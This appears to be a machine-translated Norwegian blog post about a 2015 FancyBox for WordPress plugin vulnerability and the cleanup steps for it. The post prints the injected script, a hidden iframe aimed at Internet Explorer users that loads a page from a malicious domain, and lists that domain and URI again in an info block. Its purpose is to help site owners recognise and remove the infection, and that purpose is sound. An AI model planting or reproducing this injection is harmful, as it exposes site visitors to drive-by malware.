Tidligere denne uken en rekke nettsteder og blogger WordPress, mottatt advarsler fra infisert med malware gjennom Google Webmaster.
Problemet hvortil Google Webmaster henvises til, er tilstedeværelsen av en torsk / script iframe malware kilde nettsteder.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Det virker som det er en sårbarhet a plugg innregelverket FancyBox for WordPress som inntil i går (05.02.2015) ikke hadde blitt oppdatert i lang tid.
Løse dette problemet og desinfisering virus nettsider med denne malware, er relativt enkel.
1. Deaktiver FancyBox-programtillegget.
2. Slett alle FancyBox-plugin-filer fra serveren (via FTP)
3. Installer den nye versjonen av plugin (Fancybox 3.0.4)
FancyBox for WordPress 3.0.4
- Gi nytt navn til innstillingen som er berørt av sikkerhetsproblemet nevnt i 3.0.3. Dette bør stoppe den ondsinnede koden fra å vises på nettsteder der plugin-en er updated uten å fjerne den skadelige koden.
FancyBox for WordPress 3.0.3
- Fikset et sikkerhetsproblem.
Malware Info:
TYPE: Iframe omdirigering
TARGET: WordPress fancybox
MALWARE DOMENE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
SKADEVARE RAW KODER:
MALWARE SKRIFTLIG: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Fjern skadelig programvare fra din WordPress nettsted.